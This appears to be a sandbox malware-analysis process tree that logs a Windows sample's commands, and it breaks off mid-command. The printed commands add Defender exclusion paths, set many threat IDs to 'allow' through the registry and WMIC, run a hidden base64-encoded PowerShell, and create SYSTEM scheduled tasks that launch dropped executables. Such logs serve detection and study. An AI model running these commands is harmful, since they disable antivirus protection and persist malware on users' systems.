C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dIBxqmZBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dIBxqmZBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fSairMrhYOPU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fSairMrhYOPU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iOPoQDDXUfpqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iOPoQDDXUfpqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oZVOHfyaZMUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oZVOHfyaZMUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qLBAJgyZHGjWrPVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qLBAJgyZHGjWrPVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\laRuxdflOdEFherP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\laRuxdflOdEFherP\" /t REG_DWORD /d 0 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIBxqmZBU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIBxqmZBU" /t REG_DWORD /d 0 /reg:644⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fSairMrhYOPU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fSairMrhYOPU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iOPoQDDXUfpqC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iOPoQDDXUfpqC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZVOHfyaZMUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZVOHfyaZMUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qLBAJgyZHGjWrPVB /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qLBAJgyZHGjWrPVB /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\laRuxdflOdEFherP /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\laRuxdflOdEFherP /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwJDJFSIw" /SC once /ST 07:12:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwJDJFSIw"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwJDJFSIw"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fHOlMGNmDutpzGekG" /SC once /ST 04:35:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\wDmspnJ.exe\" Nv /site_id 739435 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "fHOlMGNmDutpzGekG"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\eCiNxbZ.exeC:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\eCiNxbZ.exe tt /site_id 394347 /S2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:644⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fHOlMGNmDutpzGekG" /SC once /ST 05:50:48 /RU "SYSTEM" /TR "\"C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\abLzenc.exe\" Nv /site_id 394347 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "fHOlMGNmDutpzGekG"3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\wDmspnJ.exeC:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\wDmspnJ.exe Nv /site_id 739435 /S2⤵
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC 